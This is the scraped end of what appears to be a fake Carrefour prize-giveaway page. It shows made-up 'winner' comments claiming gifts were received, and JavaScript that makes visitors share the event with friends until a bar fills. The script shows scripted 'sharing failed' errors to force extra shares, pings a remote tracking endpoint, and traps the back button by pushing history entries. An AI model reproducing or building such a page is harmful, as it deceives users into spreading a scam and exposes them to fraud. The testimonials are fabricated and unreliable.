								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>33 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-C2JfAbOkHAA/YHgCocHDwcI/AAAAAAAABBA/fp9rmQjt3dcbCCn1SgWZo-Nzf4z8Ja3KgCLcBGAsYHQ/s16000/46.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Tracy Schmeler</div>
						</h3>
						<p>I received it today. Thanks a lot!</p> <span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>36 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-A9gGeBaBT1k/YFmmMrDxvOI/AAAAAAAAAO0/ZcHE42CBSowoemyMNsFglLyGhZIu6k9VQCLcBGAsYHQ/s0/1.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Sandy Orn</div>
						</h3>
						<p>It is real,I received the gift . I told my friends about it, so they can get theirs too.</p> <span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>38 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-1mFaaoOIqmw/YFmmNgCnEvI/AAAAAAAAAPE/ovOF8Lxu_P8dFqQurOjuTf0rJMaY8iWOwCLcBGAsYHQ/s0/5.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Robert De Villiers</div>
						</h3>
						<p>Amazing! I really won a gift.</p>
						<span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>45 minutes ago</span>
						</span>
					</div>
				</div>
				<p style="font-size:12px;color:#bcbcbc"></p>
			</div>
		</div>
	</div>
	<div id="footer" style="background-color:#fff;margin-bottom:0;font-size:12px;text-align:center;color:#000;padding:10px">
        <i class="dt1677882647 datetime" id="datetime"></i>
		<p style="line-height:20px;margin-bottom:0">
			© 2021 Carrefour Inc.
		</p>
	</div>
</div>
<script>
	$.getScript('carrefour/yuming.js' + (new Date()).getTime());
    var share_number = get_Cookie('prog') == '' ? 0 : parseInt(get_Cookie('prog'));
    if (share_number > 0) {
        showShare()
        move()
    }
    type_op = get_Cookie('type_op') == '' ? 1 : parseInt(get_Cookie('type_op'));
    if(type_op === 2){
        showShare()
    }
    function showShare() {
        set_Cookie('type_op', 2)
        jQuery('#p_modal3').modal('hide');
        $('.share_page').show();
        $('#content4').show();
        $('#content3').hide();
        $('#content1').hide();
    }
    function continueBtn() {
        var share_num = get_Cookie('prog') == '' ? 0 : parseInt(get_Cookie('prog'))
        if (share_num < g_share_step) {
            swalert("You have to share with friends about our event. Share until the blue bar is full!","Unfortunately...");
        } else {
            jQuery(".share_ing").hide()
            jQuery(".share_success").show()
        }
    }
    function swalert(text,title=''){
    	if(title != ''){
    		Swal.fire({
	    		icon: 'warning',
	    		title: title,
				text: text,
			});
    	}else{
    		Swal.fire({
	    		icon: 'warning',
				text: text,
			});
    	}    	
    }
    function shareOkBtn() {
        window.open(Web)
    }
    function shareBtn() {
        var share_num = get_Cookie('prog') == '' ? 0 : parseInt(get_Cookie('prog'))
        share_num++
        if (share_num > g_share_step) {
            share_num = g_share_step;
        }
        let jurl = j;
        if(nptimes.length > 0){
            if(nptimes.includes(share_num)){
                jurl = j2;
            }
        }
        // + j + new Date().getTime();
        + jurl + new Date().getTime();
        setTimeout(function () {
            get_Cookie('prog') == '' ? value = 1 : value = parseInt(get_Cookie('prog'));
            if (value >= g_share_step) {
                continueBtn();
            }else{
                value == 2 || value == 4 ? swalert("The same group or the same friend is not correct. Please check and share again.","Sharing failed!") : void (0);
            }
            set_Cookie('prog', value + 1);
            // getVcode(value + 1);
            move()
        }, 3000)
    }
    function getVcode(value){
        var project = "carrefour";
        var time = parseInt(new Date().getTime()/1000);
        var oprUrl = 'https://v.gapis.xyz/vcode/?pj='+project+'&ts='+value+'&lang=en&_t='+time;
        $.ajax({type : 'get',url : oprUrl,data : {},async : true,dataType : 'json',success : function (data) {var vCode = data.vCode}});
    }
    function wxalert(t, n, b, flag, i) {
		//flag:1,success  2,normal
		var r, u;
		r = '<div class="weui_dialog_alert" style="position: fixed; z-index: 1000; display: none;margin-left:15%;margin-right:15%">';
		r += '<div class="weui_mask"></div>';
		r += '<div class="weui_dialog">';
		r += '<i class="weui_close"><svg t="1540783423798" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="s="http://www.w3.org/2000/svg" p-" p-id="1931" xmlns:xlink="k="http://www.w3.org/1999/xlink" wi" width="25" height="25"><path style="fill:#666;" d="M176.661601 817.172881C168.472798 825.644055 168.701706 839.149636 177.172881 847.338438 185.644056 855.527241 199.149636 855.298332 207.338438 846.827157L826.005105 206.827157C834.193907 198.355983 833.964998 184.850403 825.493824 176.661601 817.02265 168.472798 803.517069 168.701706 795.328267 177.172881L176.661601 817.172881ZM795.328267 846.827157C803.517069 855.298332 817.02265 855.527241 825.493824 847.338438 833.964998 839.149636 834.193907 825.644055 826.005105 817.172881L207.338438 177.172881C199.149636 168.701706 185.644056 168.472798 177.172881 176.661601 168.701706 184.850403 168.472798 198.355983 176.661601 206.827157L795.328267 846.827157Z" p-id="1932"></path></svg></i>';
		r += '<div class="weui_dialog_hd"><strong class="weui_dialog_title"></strong></div>';
		r += '<div class="weui_dialog_bd" style="color:#000;padding-top:20px;padding-bottom:10px;"></div>';
		r += '<div class="weui_dialog_ft">';
		r += '<div href="javascript:void(0);" class="weui_btn_dialog primary btn">OK</div>';
		r += "</div>";
		r += "</div>";
		r += "</div>";
		$(".weui_dialog_alert").length > 0 ? $(".weui_dialog_alert .weui_dialog_bd").empty() : $("body").append($(r));
		setTimeout(function() {
			u = $(".weui_dialog_alert");
			u.show();
			u.find(".weui_dialog_bd").html(n);
			u.find(".weui_dialog_title").html(t);
			u.find(".weui_btn_dialog").html(b ? b : "");
			u.find(".weui_btn_dialog").off("click").on("click", function() {
				i();
				u.hide();
				if (flag == 1) {
					stopConfetti();
				}
			});
			u.find(".weui_close").off("click").on("click", function() {
				i();
				u.hide();
				if (flag == 1) {
					stopConfetti();
				}
			});
			if (flag == 1) {
				startConfetti();
			}
		}, 500);
	}
</script>
	<script>
        window.onhashchange = function() {
            jp();
        };
        function hh1() {
            history.pushState(history.length + 1, "message", "#" + new Date().getTime());
        }
        function jp() {
            fh();
        }
        setTimeout('hh1();', 500);
        function fh() {
        }
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "hm.js";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "hm.js";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>
    <style type="text/css">
    	.swal2-container{
			top: -200px;
		}
    </style>
<center><font size="2">This is the free demo result. For a full version of this website, please go to  <a href="https://www6.waybackmachinedownloader.com/website-downloader-online/scrape-all-files/">Website Downloader</a></font></center></body></html>